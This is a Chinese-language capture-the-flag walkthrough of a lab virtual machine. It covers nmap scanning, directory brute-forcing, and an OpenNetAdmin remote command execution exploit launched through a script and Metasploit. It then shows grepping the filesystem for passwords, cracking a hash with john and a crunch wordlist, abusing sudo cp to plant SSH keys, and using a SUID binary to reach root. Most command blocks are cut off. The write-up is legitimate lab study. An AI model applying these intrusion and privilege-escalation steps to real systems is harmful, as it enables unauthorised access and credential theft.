2020-02-14 14
——2020-02-14 16
1 | Description |
1 | Kali : 192.168.56.109 |
信息收集
主机存活:
1 | $ nmap -s -sn -T5 -v 192.168.56.1/24 | grep -B 1 "Host is up" |
扫服务:
1 | $ nmap -n -Pn -sV -O 192.168.56.114 |
1 | PORT STATE SERVICE VERSION |
访问 80 端口,无有价值信息
例行扫目录:
1 | dirsearch.py -u http://192.168.56.114 -e php --random-agents |
经访问:
1 | ######################## |
搜索相关漏洞,得到远程命令执行:
1 | searchsploit opennetadmin |
海滩登陆
使用 47691.sh
如果报错的话,可以先 dos2unix
转换一下格式,作者可能在 dos
环境下写的脚本
使用 MSF:
1 | # 先复制到桌面 |
测试发现存在 Python
使用交互式 shell
1 | > shell |
先看 /etc/passwd
有多少用户及有价值信息。目录全无访问权
这个时就需要最后的搜刮一下,得到了一组用户密码。其他用户,无有价值信息:
1 | grep -ri --color=auto --exclude-dir=proc/ 'douglas' / 2>/dev/null |
Hash 破解,没跑成来,查了一下,会用到作者给的提示 aefhrt
。使用 crunch
生产字典:
1 | john --wordlist=/usr/share/wordlists/rockyou.txt hash |
1 | $ crunch 10 10 aefhrt >word.txt |
身份切换(SSH免密登陆)
登录 SSH,得到普通用户,目录下除了 .ssh/
外无其他有价值信息。
可使用的 sudo
命令为 cp
:
涉及知识的盲区了,特地去查询记录了一下
cp
命令可以配合 SSH(authorized_keys)
免密登录到其他用户:
1 | # 为目标生成 ssh key |
说是有邮件,查看邮件,得到另一组用户名和密码,登陆成功。
权限提升
看目录,得到一个 SUID
的二进制文件,可以直接成为 root
,进 root
目录,得到 Flag
与其说是提权,不如说是作者准备好的外挂道具,让你可以一举成神,有种欲求不满的感觉,前面刚鼓起的劲,到了后面直接一键 root
,无法满足啊
不过,也是学到技能了
也可以使用如下方式:
- 创建一个权限
777
的文件 - 使用
find
命令查找Jen
创建的文件 - 使用
cp
命令,复制找到的文件 到777
权限的 文件 cat
查看
1 | # sudo -u |
1 | sudo -u jen /bin/cp /var/mail/jen ./test |